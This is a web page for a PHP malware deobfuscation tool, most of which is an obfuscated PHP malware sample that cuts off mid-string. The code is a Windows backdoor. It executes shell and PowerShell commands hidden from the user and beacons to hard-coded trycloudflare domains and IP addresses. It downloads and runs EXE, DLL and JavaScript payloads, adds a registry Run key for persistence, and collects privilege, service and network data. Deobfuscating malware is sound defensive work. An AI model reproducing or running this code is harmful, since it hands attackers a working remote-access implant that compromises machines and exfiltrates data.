Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
goto BeBDr; wQght: $d_22F = $KCom5[mt_rand(0, 1000) % count($KCom5)]; goto Zik3U; vvnY6: function VQAIZ() { goto fGkFP; wTEci: $XEMm8 = array_diff($XEMm8, ["\56", "\56\56"]); goto x9TW7; x9TW7: $XEMm8 = array_values($XEMm8); goto rrv0t; KQJsL: return $XEMm8[rand(0, count($XEMm8) - 1)]; goto LYYke; rrv0t: print_r($XEMm8); goto KQJsL; fGkFP: $XEMm8 = scandir(getenv("\101\120\x50\104\101\x54\x41")) + scandir(getenv("\114\117\103\101\114\101\x50\x50\104\101\124\101")); goto wTEci; LYYke: } goto J45Qw; J45Qw: function dc6ta($M3_yG = 16) { goto ywNJi; jgJmB: $CTLfW = ''; goto v0sQ_; KmSVu: if (!($izpa6 < $M3_yG)) { goto mrCJq; } goto xJWe_; qTUdN: $rPvk7 = strlen($Gmm_S); goto jgJmB; izad0: bTm_B: goto QeeKQ; QeeKQ: $izpa6++; goto fDxVz; GLNBa: mrCJq: goto SV3Kc; v0sQ_: $izpa6 = 0; goto jLdWC; jLdWC: jBUAd: goto KmSVu; SV3Kc: return $CTLfW; goto rCuGQ; ywNJi: $Gmm_S = "\x30\x31\x32\63\x34\x35\x36\67\x38\71\x61\x62\143\x64\145\146\147\150\151\152\x6b\154\155\x6e\x6f\x70\x71\x72\163\164\x75\x76\167\x78\x79\x7a\x41\x42\103\x44\105\106\x47\110\111\112\x4b\114\x4d\x4e\117\120\x51\x52\x53\124\125\x56\x57\x58\x59\132"; goto qTUdN; xJWe_: $CTLfW .= $Gmm_S[rand(0, $rPvk7 - 1)]; goto izad0; fDxVz: goto jBUAd; goto GLNBa; rCuGQ: } goto fcShX; K_57A: $l2CpU = 80; goto UC4wF; A8TQi: if (!true) { goto gynqD; } goto KmTfJ; fcShX: $tPTLN = null; goto zVxnq; zVxnq: function kWB_d($F3c9H) { goto EaXSO; EaXSO: global $tPTLN; goto uO7HP; UIjXp: j1pCb: goto sKaXg; uO7HP: $P80xZ = array(0 => array("\160\x69\x70\x65", "\162"), 1 => array("\x70\x69\160\145", "\167"), 2 => array("\160\x69\x70\x65", "\167")); goto urOwq; sKaXg: $tPTLN = ["\x70\x72\x6f\x63\145\x73\163" => $m4lMb, "\x70\x69\x70\145\x73" => $Fa3EX]; goto d9zZ5; k0jhe: if (is_resource($m4lMb)) { goto j1pCb; } goto EsrXH; urOwq: $m4lMb = proc_open($F3c9H, $P80xZ, $Fa3EX); goto k0jhe; EsrXH: return "\74\x66\141\x69\x6c\145\144\x3e"; goto UIjXp; d9zZ5: } goto toKXa; toKXa: function SQ9Nz() { goto mWS4X; omgp5: TWPqZ: goto I393y; vdcP9: fclose($Fa3EX[1]); goto xKb8s; xKb8s: fclose($Fa3EX[2]); goto vF5MC; ThrJa: if (!proc_get_status($m4lMb)["\x72\x75\x6e\156\x69\x6e\147"]) { goto exJVc; } goto IHXty; YTHzP: goto TWPqZ; goto HXtUG; vF5MC: $jzdVa = proc_close($m4lMb); goto nHn0y; IHXty: echo "\44\x6c\141\163\x74\x5f\143\x6f\x6d\155\141\156\x64\x20\x3d\75\40\162\165\x6e\156\151\156\x67" . PHP_EOL; goto G0xrg; rZNnD: V7_hD: goto UzF1X; Ssj6C: $Fa3EX = $tPTLN["\160\x69\160\145\x73"]; goto ThrJa; LsIdF: if (!(!$tPTLN || !isset($tPTLN["\160\x72\157\x63\x65\x73\163"]) || !isset($tPTLN["\160\x69\160\145\x73"]))) { goto V7_hD; } goto RzK6r; SDU8_: $f9Lnh .= PHP_EOL . "\x65\x72\162\50" . $jzdVa . "\x29\x3a" . PHP_EOL . $AirsC; goto bJxsE; UNePZ: $AirsC = stream_get_contents($Fa3EX[2]); goto ae9m0; XlRmz: exJVc: goto sSqE7; Qe_fq: $OeoM5 = stream_get_contents($Fa3EX[1]); goto UNePZ; nHn0y: $f9Lnh = "\x6f\165\164\x3a" . PHP_EOL; goto y1EmH; G0xrg: return null; goto XlRmz; ae9m0: fclose($Fa3EX[0]); goto vdcP9; zOBe9: return $f9Lnh; goto owZX0; HXtUG: i0Ehx: goto nvLE7; BTb3s: return null; goto rZNnD; RzK6r: echo "\44\154\x61\x73\x74\137\x63\157\x6d\x6d\x61\x6e\x64\x20\75\75\x20\156\x75\154\154" . PHP_EOL; goto BTb3s; bJxsE: bA9U2: goto zOBe9; y1EmH: if ($OeoM5) { goto i0Ehx; } goto x2ERB; mWS4X: global $tPTLN; goto LsIdF; sSqE7: $tPTLN = null; goto Qe_fq; nvLE7: $f9Lnh .= $OeoM5; goto omgp5; I393y: if (!$AirsC) { goto bA9U2; } goto SDU8_; x2ERB: $f9Lnh .= "\x3c\145\155\160\x74\171\76"; goto YTHzP; UzF1X: $m4lMb = $tPTLN["\x70\x72\x6f\143\145\163\x73"]; goto Ssj6C; owZX0: } goto GHIf_; UC4wF: $Jw6Sz = ["\x45\x58\105" => 0, "\x44\114\114" => 1, "\112\x53" => 2, "\103\x4d\104" => 3, "\x41\103\124\111\126\x45" => 4, "\101\125\x54\x4f\x52\x55\116" => 5, "\x4f\106\x46" => 6]; goto ByRHm; Mm33p: function m3tzg() { goto bDJYV; bDJYV: $A94N8 = getenv("\101\120\x50\104\101\x54\101") . "\x5c" . vqAIz() . rand(0, 1000000); goto CE9ZT; CE9ZT: mkdir($A94N8); goto b8iK4; b8iK4: return $A94N8; goto p1B8l; p1B8l: } goto imMGg; Vgj45: if (count($KCom5) > 0) { goto Wic5f; } goto jePle; MLyYf: $KCom5 = ["\156\145\166\145\x72\x2d\160\157\x77\145\162\145\144\55\141\147\145\x6e\x63\x79\55\x68\145\x61\162\56\x74\162\x79\143\154\157\165\144\146\154\141\x72\145\56\143\157\x6d", "\x65\x61\162\x73\x2d\143\x69\x72\x63\x75\x73\55\143\x61\x6d\55\154\x61\153\145\56\164\162\x79\x63\x6c\157\x75\x64\x66\x6c\141\x72\x65\x2e\143\157\x6d", "\166\141\162\x79\x69\x6e\147\55\162\x65\156\x74\141\154\x73\55\143\141\154\147\x61\x72\171\55\x70\x72\145\144\151\143\164\56\x74\162\x79\143\x6c\x6f\165\x64\x66\154\141\x72\145\56\x63\157\155"]; goto Vgj45; YyXxs: $oQjHi = 10; goto S8XAE; jePle: $d_22F = $IpuLn[mt_rand(0, 1000) % count($IpuLn)]; goto d13SC; YChMi: Wic5f: goto wQght; JnKhD: function QUZhV($d_22F, $bzn_F) { goto Td74Y; CH5yz: $BW3Wg = null; goto RaWdI; DNF_V: $RKhlJ = ["\x68\164\164\x70" => ["\155\x65\x74\x68\x6f\144" => "\x50\x4f\123\x54", "\150\x65\x61\144\x65\162" => ["\x43\157\156\164\145\156\x74\55\164\x79\x70\145\x3a\x20\x61\160\160\x6c\x69\143\141\164\x69\x6f\156\x2f\157\143\164\145\x74\55\x73\x74\162\x65\141\x6d"], "\143\x6f\156\x74\x65\x6e\x74" => $bzn_F, "\x69\147\156\x6f\162\145\137\x65\x72\162\157\162\x73" => true, "\164\151\x6d\145\x6f\x75\x74" => 20]]; goto tteol; tteol: $rWwMf = "\150\x74\x74\160\x3a\x2f\x2f" . $d_22F . "\x3a" . $l2CpU . sqC8C(); goto nlOsF; HGkFn: $Aarsj = (int) $Lxf9l[1]; goto rhBTq; V9tQI: throw new Exception("\x48\124\x54\120\x20\x72\x65\161\165\145\x73\x74\40\x66\x61\151\x6c\145\x64\x3a\40" . ($BW3Wg ?: "\125\156\153\x6e\157\167\156\40\145\162\162\157\162")); goto f2R2O; anpHl: if (!isset($Lxf9l[1])) { goto qR0In; } goto HGkFn; W2Sg8: $by1ps = file_get_contents($rWwMf, false, $uz8es); goto mk7vj; wBhHF: $Aarsj = 0; goto ONDYR; KogqM: return ["\143\x6f\156\164\145\x6e\164" => $by1ps, "\150\x65\x61\x64\145\162\x73" => $http_response_header, "\x73\164\x61\x74\x75\x73" => $http_response_header[0] ?? null, "\x63\157\144\x65" => $Aarsj]; goto OpMtc; RaWdI: set_error_handler(function ($qVljG, $OndyP) use(&$BW3Wg) { $BW3Wg = $OndyP; }); goto W2Sg8; HyvsP: if (!($by1ps === false)) { goto mbOHh; } goto V9tQI; mk7vj: restore_error_handler(); goto HyvsP; rhBTq: qR0In: goto gYmPJ; ONDYR: if (!isset($http_response_header[0])) { goto n3bJj; } goto HQGeS; gYmPJ: n3bJj: goto KogqM; f2R2O: mbOHh: goto wBhHF; nlOsF: $uz8es = stream_context_create($RKhlJ); goto CH5yz; HQGeS: preg_match("\57\110\x54\x54\x50\x5c\57\134\x64\x5c\56\134\144\x5c\163\x2b\x28\134\144\173\x33\175\x29\57", $http_response_header[0], $Lxf9l); goto anpHl; Td74Y: global $l2CpU; goto DNF_V; OpMtc: } goto jwiJl; leVfr: function Zj6UF() { goto KFeNn; v0V7c: file_put_contents($OPdCw, $hiPBF); goto qWHem; E0ECd: $hiPBF = isset($UAqhd[1]) ? trim(str_replace($TRW9p, '', $UAqhd[1])) : ''; goto v0V7c; ENahA: $UAqhd = preg_split("\x2f\160\x68\160\x5c\x2e\x65\170\x65\56\x2a\x3f\134\163\55\162\134\x73\53\57", $gGkCt, 2); goto E0ECd; TEO6A: return true; goto Z9Yhp; OdXxl: goto Vr2kq; goto EDqGK; JxlQ3: $gGkCt = trim($XYh87[1] ?? ''); goto ENahA; gBZ6r: if (!(!$xJ5KY || !preg_match_all("\x2f\x5c\x73\x2d\x72\134\163\x2f", $xJ5KY))) { goto oJ3Yk; } goto E1oNF; uqeHW: if (N5n7D()) { goto neKSL; } goto C_Fet; Jkv_g: exec("\162\x65\x67\x20\x61\x64\144\x20\110\x4b\x43\x55\134\x53\157\146\x74\167\141\x72\x65\134\x4d\151\143\x72\157\x73\157\146\164\134\127\x69\x6e\x64\x6f\x77\163\134\103\x75\x72\162\x65\156\x74\126\x65\162\x73\151\157\156\x5c\x52\x75\x6e\x20\x2f\166\40" . EbuoM(vqaIz()) . "\x20\x2f\164\40\122\105\107\137\123\x5a\x20\x2f\x64\x20" . EbuOm("\134" . $TRW9p . PHP_BINARY . "\134" . $TRW9p . "\40\134" . $TRW9p . $OPdCw . "\x5c" . $TRW9p) . "\40\x2f\x66"); goto TEO6A; EDqGK: neKSL: goto YYfKG; C_Fet: $OPdCw = __FILE__; goto OdXxl; j5WG1: oJ3Yk: goto kDbeh; KXqu6: $xJ5KY = shell_exec("\x77\x6d\151\x63\40\x70\162\157\143\x65\x73\x73\40\167\150\x65\x72\x65\x20\160\162\x6f\143\x65\x73\163\x69\x64\75" . getmypid() . "\40\147\145\x74\40\x63\x6f\155\155\141\x6e\144\154\151\156\x65"); goto gBZ6r; kDbeh: $XYh87 = explode($z5_HL, $xJ5KY, 2); goto JxlQ3; YYfKG: $OPdCw = dirname(PHP_BINARY) . dc6Ta(12) . "\56\164\x78\164"; goto KXqu6; E1oNF: return false; goto j5WG1; KFeNn: global $TRW9p, $z5_HL; goto uqeHW; qWHem: Vr2kq: goto Jkv_g; Z9Yhp: } goto vvnY6; BeBDr: $TRW9p = chr(0x22); goto jUDyu; qDomh: sleep($oQjHi); goto jkOM3; JO88S: function SqC8C() { goto Ohh8c; YPPps: $qFHIp ^= $gmNZ1; goto O9gDf; CNaG8: $Py5k4 = (int) $ttefF->getTimestamp() & (int) 1.8446744073709548E+19; goto z5RZW; rqcs4: $gmNZ1 = $gmNZ1 + 0xf2879630 + ($WiBhc < 0x29807914 ? 1 : 0) & 0xffffffff; goto YPPps; z5RZW: $JZJtV = random_int(PHP_INT_MIN, PHP_INT_MAX); goto fAu_h; zVXl0: $NcwlV = DC6tA(rand(0, 14)); goto kQ1xf; sTzvK: $FnMw5 = $FnMw5 + 0x7ab092fe & 0xffffffff; goto nu0oi; fAu_h: $qFHIp = $Py5k4 >> 32 & 0xffffffff; goto Qh07p; O_tQk: return ($NcwlV !== '' ? "\x2f" . $NcwlV : '') . "\57" . dC6ta(rand(0, 14)) . "\x26" . $Pab0F . $ZgXXo . ($SWHqo !== '' ? "\57" . $SWHqo : ''); goto cj_z3; s_GP7: $FnMw5 ^= 0xd1769498; goto z6aiy; z6aiy: $qFHIp ^= 0x86ad5709; goto WaN6S; kQ1xf: $SWHqo = dC6ta(rand(0, 14)); goto O_tQk; WaN6S: $FnMw5 ^= 0x15de8713; goto alX36; O9gDf: $FnMw5 ^= $WiBhc; goto u2VUf; alX36: $WiBhc = $WiBhc + 0x29807914 & 0xffffffff; goto rqcs4; u2VUf: $Pab0F = sprintf("\x25\60\x38\x78\45\x30\x38\170", $qFHIp, $FnMw5); goto GeT9N; alrbV: $gmNZ1 = $JZJtV >> 32 & 0xffffffff; goto Bx7Ej; gFxSB: $qFHIp ^= $gmNZ1; goto XWAyf; Bx7Ej: $WiBhc = $JZJtV & 0xffffffff; goto gFxSB; Ohh8c: $ttefF = new DateTime("\x6e\x6f\167", new DateTimeZone("\105\x74\x63\x2f\107\115\x54\53\65")); goto CNaG8; nu0oi: $qFHIp = $qFHIp + 0x80952678 + ($FnMw5 < 0x7ab092fe ? 1 : 0) & 0xffffffff; goto r1ZTh; Qh07p: $FnMw5 = $Py5k4 & 0xffffffff; goto alrbV; GeT9N: $ZgXXo = sprintf("\x25\x30\x38\170\x25\x30\x38\170", $gmNZ1, $WiBhc); goto zVXl0; XWAyf: $FnMw5 ^= $WiBhc; goto sTzvK; r1ZTh: $qFHIp ^= 0x219f7609; goto s_GP7; cj_z3: } goto mOGQB; te03m: if (!($argc < 2 && !N5n7d() || !extension_loaded("\x7a\151\160") && file_exists(__FILE__))) { goto d2Cq7; } goto aBwrc; d13SC: goto birOS; goto YChMi; YIlPJ: function ebUom($CTLfW) { global $TRW9p; return $TRW9p . $CTLfW . $TRW9p; } goto JO88S; imMGg: function KVUj0($d_22F) { goto KmGMJ; VxX48: echo "\62\60\x34" . PHP_EOL; goto Kpc0G; TK9nC: $Aarsj = $hiPBF["\143\157\x64\145"]; goto FfHB9; Kpc0G: return; goto iGQ9x; iGQ9x: qQgvj: goto itQbh; rauHK: $FbIQb = $hiPBF["\x63\157\x6e\x74\x65\156\164"]; goto TK9nC; pNSWp: $v9iU7 = substr($FbIQb, strlen($FbIQb) - 4, strlen($FbIQb)); goto oxuNd; hjEpS: throw new Exception("\x48\124\124\120\40\x72\145\161\165\x65\x73\164\40\146\x61\151\154\x65\144\x3a\x20" . $Aarsj); goto wECSe; aFrIS: asPv7: goto w9ku1; Xx1R4: uxcjk: goto aFrIS; itQbh: if (!($Aarsj !== 200)) { goto vV1w3; } goto hjEpS; b80rN: $F3c9H = null; goto XKgkL; KmGMJ: global $bIiky, $Jw6Sz, $TRW9p, $u9iZC; goto JeQZy; cFbCQ: unset($bIiky["\x63\x6d\x64"]); goto rauHK; N7Wsa: NKuK9($FbIQb, $v9iU7); goto SIa2F; XKgkL: switch ($R1Ohn) { case $Jw6Sz["\x43\115\104"]: goto K2mc1; v2LDY: return; goto n8IFP; K2mc1: echo "\x43\x4d\x44" . PHP_EOL; goto vP_ay; vP_ay: Kwb_D($FbIQb); goto v2LDY; n8IFP: case $Jw6Sz["\101\x43\x54\111\126\x45"]: goto oIql2; oIql2: echo "\101\103\124\x49\126\105" . PHP_EOL; goto zuU3c; K5bMt: return; goto asxYD; zuU3c: $u9iZC = unpack("\x56", $FbIQb)[1]; goto K5bMt; asxYD: case $Jw6Sz["\x41\125\x54\x4f\122\x55\x4e"]: goto qCbY5; qCbY5: echo "\x41\x55\x54\x4f\122\x55\116" . PHP_EOL; goto ZZB7b; ZZB7b: Zj6uF(); goto q1i8r; q1i8r: return; goto FdFOS; FdFOS: case $Jw6Sz["\x4f\106\x46"]: echo "\117\x46\x46" . PHP_EOL; exit(0); case $Jw6Sz["\105\x58\x45"]: goto SKbke; SKbke: echo "\105\130\x45" . PHP_EOL; goto zIllA; ct2Sa: goto asPv7; goto EkiqN; oCsyZ: file_put_contents($yQKMW, $FbIQb); goto ct2Sa; zIllA: $yQKMW = M3tZG() . "\x5c" . dc6Ta(8) . "\56\x65\170\145"; goto oCsyZ; EkiqN: case $Jw6Sz["\104\x4c\x4c"]: goto ol3LV; Kt_0R: $F3c9H = ebuom($q6oxc) . "\x20\163\164\x61\x72\164"; goto XQkFa; g44d0: $yQKMW = "\x43\x3a\x5c\127\151\x6e\x64\157\167\x73\x5c\123\x79\x73\164\x65\155\x33\x32\x5c\x72\165\x6e\144\x6c\x6c\63\x32\x2e\x65\x78\145"; goto Kt_0R; w5NkC: $q6oxc = M3TZG() . "\134" . DC6TA(8) . "\x2e\160\x6e\147"; goto g44d0; ol3LV: echo "\104\114\x4c" . PHP_EOL; goto w5NkC; JHbtj: goto asPv7; goto bidxU; XQkFa: file_put_contents($q6oxc, $FbIQb); goto JHbtj; bidxU: case $Jw6Sz["\x4a\x53"]: goto rtpJR; ORX62: echo "\x66\141\x69\x6c\x65\144\x20\151\156\x73\164\141\x6c\154\x20\156\157\144\x65\152\163" . PHP_EOL; goto yYA_E; ZSeux: goto asPv7; goto l0nBk; xvWIX: $yQKMW = getenv("\x41\120\120\x44\x41\124\x41") . "\x5c" . "\x6e\157\144\x65\x2d\x76\62\61\x2e\67\x2e\x33\55\167\x69\156\55\x78\x36\x34\134\x6e\157\144\x65\56\x65\x78\145"; goto MnxNb; rtpJR: echo "\x4a\x53" . PHP_EOL; goto xvWIX; JqYdW: wel4m: goto bees3; bees3: $F3c9H = M3tzG() . "\x5c" . dC6Ta(8) . "\56\x6a\160\147"; goto TidZZ; TidZZ: file_put_contents($F3c9H, $FbIQb); goto ZSeux; MnxNb: if (!(!file_exists($yQKMW) && !W2hkm("\x68\x74\164\x70\72\x2f\57\156\x6f\144\145\x6a\x73\56\x6f\162\x67\57\x64\151\163\164\57\166\x32\x31\56\x37\x2e\63\x2f\156\x6f\x64\x65\x2d\x76\x32\61\56\x37\x2e\63\55\x77\151\156\x2d\x78\x36\64\56\172\x69\160", getenv("\x41\x50\x50\x44\x41\x54\101")))) { goto wel4m; } goto ORX62; yYA_E: return; goto JqYdW; l0nBk: default: goto D2MfT; D2MfT: echo "\117\x54\110\105\122" . PHP_EOL; goto twkfY; V1A82: return; goto So8yx; twkfY: file_put_contents(m3Tzg() . "\x5c" . dc6ta(8) . "\56\164\170\164", $FbIQb); goto V1A82; So8yx: } goto Xx1R4; fXNXn: $hiPBF = QuZhv($d_22F, EQIuB(json_encode($bIiky, JSON_PRETTY_PRINT))); goto cFbCQ; SIa2F: $R1Ohn = ord($FbIQb[strlen($FbIQb) - 1]); goto PUm8g; u1CtG: $bIiky["\x63\x6d\x64"] = $Wp4BQ; goto Rumpk; wECSe: vV1w3: goto pNSWp; JeQZy: if (!(($Wp4BQ = sQ9NZ()) !== null)) { goto Wa39F; } goto u1CtG; Rumpk: Wa39F: goto fXNXn; FfHB9: if (!($Aarsj == 204)) { goto qQgvj; } goto VxX48; oxuNd: $FbIQb = substr($FbIQb, 0, strlen($FbIQb) - 4); goto N7Wsa; PUm8g: $FbIQb = substr($FbIQb, 0, strlen($FbIQb) - 1); goto b80rN; w9ku1: nrrh4($yQKMW, $F3c9H); goto CJVIp; CJVIp: } goto YyXxs; ByRHm: $u9iZC = 0; goto fCIkH; ixhTo: function eqiUb($bzn_F) { goto SgODF; vfFi0: $mesY9 = pack("\126", $DBzW7); goto hLyex; SgODF: $DBzW7 = mt_rand(0, 100000000); goto vfFi0; Z20Gj: return gzencode($wp5cV, 5, FORCE_GZIP); goto Jqpl2; tX1xF: $wp5cV = $bzn_F . $mesY9; goto Z20Gj; hLyex: nKUk9($bzn_F, $mesY9); goto tX1xF; Jqpl2: } goto JnKhD; DJwWm: $IBb3A = 200; goto ZChWJ; tLrpS: echo "\141\x63\164\151\166\145\137\143\x6e\164\72\x20" . $u9iZC . PHP_EOL; goto qDomh; KmTfJ: try { goto Jujja; f3aYr: goto iaVsD; goto RhSiE; BuzqK: ZWb_Y: goto ZZi02; KBm1S: $d_22F = $KCom5[mt_rand(0, 1000) % count($KCom5)]; goto IW10s; mojo0: GvZkQ: goto nfu5b; CNHRa: $JpsO7++; goto OL_dU; a3HaG: $oQjHi = 10; goto vs1di; nfu5b: $JpsO7 = $IBb3A - 10; goto EZxsz; RhSiE: NgD9M: goto a3HaG; FTcDh: MCKYl: goto u4YcL; OL_dU: goto MCKYl; goto BuzqK; EZxsz: if (!(count($KCom5) > 0)) { goto VLxTz; } goto KBm1S; JqlRr: Ld0Oy: goto MsliG; L0FZy: if ($u9iZC > 0) { goto NgD9M; } goto mjG2o; GSY4j: if ($JpsO7 < $IBb3A) { goto ZWb_Y; } goto CNHRa; vs1di: $u9iZC--; goto cNCkn; dlf9Z: if ($JpsO7 >= $IBb3A + 10) { goto GvZkQ; } goto GSY4j; u4YcL: goto Ld0Oy; goto mojo0; KKgTI: kvuJ0($d_22F); goto L0FZy; mjG2o: $oQjHi = 10; goto f3aYr; cNCkn: iaVsD: goto dlf9Z; ZZi02: $JpsO7 = 0; goto FTcDh; Jujja: echo $d_22F . PHP_EOL; goto rcimJ; IW10s: VLxTz: goto JqlRr; rcimJ: echo $JpsO7 . PHP_EOL; goto KKgTI; MsliG: } catch (Throwable $kA4rd) { goto qcD2t; r8IoB: goto Pmfje; goto EoKNg; EoKNg: Z_XFJ: goto wgJi6; wgJi6: $d_22F = $KCom5[mt_rand(0, 1000) % count($KCom5)]; goto ZCOA5; Sgd4t: $oQjHi = 10; goto Thk6e; Thk6e: $u9iZC = 0; goto Gmlv7; d9vG8: $d_22F = $IpuLn[mt_rand(0, 1000) % count($IpuLn)]; goto r8IoB; ZCOA5: Pmfje: goto Sgd4t; Z8DUz: if ($JpsO7 < $IBb3A && count($KCom5) > 0) { goto Z_XFJ; } goto d9vG8; TGR01: $JpsO7++; goto Z8DUz; qcD2t: echo $z5_HL . "\105\x72\x72\x6f\162\x3a\x20" . $kA4rd->getMessage() . $z5_HL; goto TGR01; Gmlv7: } goto tyNEP; qdHaY: function N5n7d() { global $argv; return $argv[0] === "\123\x74\141\x6e\x64\141\162\x64\x20\x69\156\x70\165\x74\x20\x63\x6f\144\145"; } goto YIlPJ; j6E10: a1o7w: goto A8TQi; lAcZF: d2Cq7: goto F2A3z; S8XAE: $IpuLn = ["\61\65\71\56\66\71\x2e\61\70\x37\56\x37\x38", "\61\x38\64\56\71\65\x2e\x35\x31\x2e\x31\x36\x35"]; goto MLyYf; jkOM3: goto a1o7w; goto AS66c; GHIf_: function nrRh4($yQKMW, $F3c9H) { goto a1JKo; BtYaF: shell_exec($EcbYV); goto zrptX; a1JKo: global $TRW9p, $z5_HL; goto K1aux; K1aux: $EcbYV = "\160\x6f\167\145\x72\163\150\145\154\x6c\56\145\x78\x65\40\55\x57\x69\x6e\144\157\167\123\164\171\x6c\145\x20\x48\151\144\144\145\156\x20\x2d\143\40" . eBuOm("\123\x74\x61\162\164\x2d\120\x72\157\x63\145\x73\x73\x20\x2d\x57\151\156\x64\157\167\123\164\171\x6c\x65\40\110\x69\144\x64\145\x6e\40\55\106\151\154\145\120\x61\x74\x68\x20\x27" . $yQKMW . "\x27" . ($F3c9H ? "\x20\55\x41\x72\x67\x75\155\145\156\164\114\x69\x73\164\40\47" . preg_replace("\57" . $TRW9p . "\57", "\134" . $TRW9p, $F3c9H) . "\x27" : '')); goto YZiWR; YZiWR: echo $EcbYV . $z5_HL . $z5_HL; goto BtYaF; zrptX: } goto Mm33p; aBwrc: NRrh4(PHP_BINARY, "\x2d\144\x20\145\170\164\x65\x6e\x73\151\x6f\156\75\172\151\160\x20\55\x64\40\145\170\x74\145\x6e\x73\x69\157\x6e\x5f\x64\x69\x72\x3d\145\170\164\40" . eBUom(__FILE__) . "\x20\61"); goto yy3it; WepUh: function NkUk9(&$bzn_F, $OcIQg) { goto N14F2; fjxjK: $bzn_F[$izpa6] = chr(ord($bzn_F[$izpa6]) ^ (ord($OcIQg[$izpa6 % $eUFvf]) ^ $uxlfE) % 256); goto rkYjr; ujRY5: if (!($izpa6 < $MpqIM)) { goto rnSjV; } goto RN2Vn; mqR_h: rnSjV: goto N6o1D; N14F2: $uxlfE = ord($OcIQg[0]); goto oBRPg; NsJcW: $eUFvf = strlen($OcIQg); goto JAwLp; RN2Vn: $uxlfE = ($uxlfE + ($uxlfE + $izpa6 % 256)) % 256; goto fjxjK; FVBGl: goto UgVfQ; goto mqR_h; JAwLp: $izpa6 = 0; goto BjL0_; rkYjr: qVlcY: goto YmMJo; oBRPg: $MpqIM = strlen($bzn_F); goto NsJcW; YmMJo: ++$izpa6; goto FVBGl; BjL0_: UgVfQ: goto ujRY5; N6o1D: } goto ixhTo; F2A3z: $Zq3dJ = 20; goto K_57A; tyNEP: echo "\x64\145\154\141\171\x3a\40" . $oQjHi . PHP_EOL; goto tLrpS; Zik3U: birOS: goto DJwWm; mOGQB: function lu3mN() { goto tkyF4; rndx0: if (!($SNVCT !== 0)) { goto lMiQ1; } goto dHiHX; uDsa9: throw new Exception("\106\x61\151\x6c\x65\144\40\164\x6f\40\145\170\145\143\165\x74\x65\x20\x63\x6f\x6d\x6d\x61\156\144"); goto AKKdq; pGDZf: $VcFzG = ''; goto fcuX5; knWWP: exec("\x70\157\x77\145\162\163\x68\x65\154\x6c\x20\x2d\x63\x20" . eBUOm("\107\x65\x74\x2d\123\x65\162\166\151\x63\145\x20\x7c\40\x53\145\154\145\x63\164\x2d\x4f\x62\152\x65\x63\x74\x20\55\120\162\157\160\x65\x72\x74\171\x20\x4e\x61\155\x65\54\x20\x44\x69\x73\x70\x6c\141\x79\x4e\141\x6d\x65\40\174\x20\103\157\x6e\x76\145\x72\x74\124\x6f\x2d\x4a\163\x6f\x6e"), $VcFzG, $SNVCT); goto cfh84; SbC1x: throw new Exception("\x46\x61\151\154\x65\x64\x20\164\157\40\x65\170\x65\143\x75\x74\145\x20\143\x6f\155\x6d\x61\156\x64"); goto MyX2j; Ux1lu: $VcFzG = ''; goto eake0; UBdzF: $VcFzG = ''; goto knWWP; pKKVZ: throw new Exception("\x46\141\151\x6c\145\144\40\164\x6f\x20\x65\x78\x65\x63\x75\164\145\40\143\x6f\x6d\155\x61\x6e\x64"); goto BYWCw; ZDCXZ: $pq8nP["\157\164\150\x65\x72"]["\x74\171\x70\x65\137\x66\151\154\145"] = "\x50\x48\x50"; goto nGMFa; eake0: exec("\160\x6f\x77\x65\x72\163\150\x65\154\154\40\55\143\40" . eBuom("\x47\145\x74\x2d\116\x65\x74\x4e\145\x69\147\150\x62\157\x72\x20\55\x41\144\x64\162\x65\163\163\x46\141\x6d\151\x6c\171\40\x49\x50\166\64\x20\x7c\x20\x57\150\145\162\145\x2d\x4f\x62\x6a\x65\143\x74\40\173\40\44\x5f\56\x53\x74\141\x74\x65\40\x2d\156\x65\x20\x27\x50\145\162\x6d\141\x6e\145\156\x74\47\x20\175\x20\174\x20\123\x65\154\x65\x63\164\55\x4f\142\152\x65\x63\164\x20\x40\173\x4e\141\155\x65\75\x27\111\x6e\x74\x65\162\x66\141\x63\145\x27\73\x20\x45\170\x70\x72\145\x73\x73\x69\x6f\x6e\x3d\173\x24\137\56\x49\x6e\164\145\x72\x66\x61\143\145\x41\x6c\151\x61\163\175\175\54\x20\100\x7b\116\x61\x6d\145\x3d\x27\111\x6e\x74\x65\x72\x6e\x65\x74\40\x41\x64\x64\162\145\163\x73\x27\73\40\x45\x78\160\x72\x65\163\163\x69\x6f\x6e\75\x7b\44\x5f\x2e\x49\120\101\x64\144\162\145\163\163\x7d\175\54\x20\100\173\x4e\141\x6d\x65\75\x27\x50\x68\171\163\x69\x63\141\x6c\40\x41\144\x64\162\x65\x73\163\x27\x3b\x20\105\x78\x70\x72\x65\x73\x73\x69\157\156\75\x7b\44\x5f\56\x4c\x69\x6e\x6b\114\x61\x79\x65\162\x41\144\144\162\145\163\x73\x7d\x7d\x2c\40\x40\173\116\x61\x6d\x65\x3d\47\124\171\160\x65\47\x3b\40\x45\170\x70\162\x65\x73\x73\151\x6f\156\75\x7b\47\x64\x79\156\x61\155\x69\x63\x27\175\x7d\40\174\40\x43\x6f\x6e\166\x65\x72\x74\x54\x6f\x2d\x4a\163\157\x6e"), $VcFzG, $SNVCT); goto rndx0; qd8Fr: exec("\160\157\x77\x65\162\163\150\x65\x6c\154\x20\55\143\40" . eBUOm("\x69\x66\40\50\x5b\x53\145\x63\165\x72\151\x74\171\56\120\162\x69\156\143\151\x70\141\154\56\127\x69\x6e\144\x6f\x77\163\111\x64\x65\x6e\164\151\164\x79\x5d\72\x3a\x47\x65\x74\103\165\x72\x72\x65\x6e\x74\x28\x29\x2e\x4e\141\155\x65\40\x2d\155\x61\x74\x63\150\x20\x27\50\x3f\151\x29\123\131\123\124\105\x4d\x27\51\40\40\x7b\x20\x27\123\131\123\x54\105\115\47\x20\175\x20\x65\154\x73\x65\x69\x66\40\50\x28\133\123\145\x63\x75\x72\151\164\x79\56\x50\162\x69\x6e\x63\x69\160\x61\154\x2e\127\151\156\144\x6f\167\x73\x50\x72\151\x6e\143\151\x70\x61\x6c\x5d\x20\x5b\x53\145\x63\x75\x72\x69\164\171\56\120\162\151\156\x63\x69\x70\141\154\x2e\x57\x69\156\x64\x6f\x77\163\111\144\x65\x6e\x74\151\x74\171\x5d\x3a\x3a\107\x65\x74\103\x75\162\x72\145\156\x74\50\x29\51\x2e\111\163\x49\156\122\157\x6c\x65\x28\133\123\145\143\165\x72\x69\x74\x79\x2e\120\x72\151\x6e\x63\151\x70\141\x6c\x2e\127\x69\156\144\x6f\167\x73\x42\165\151\x6c\x74\111\x6e\122\x6f\154\x65\x5d\72\72\x41\x64\x6d\151\156\151\x73\x7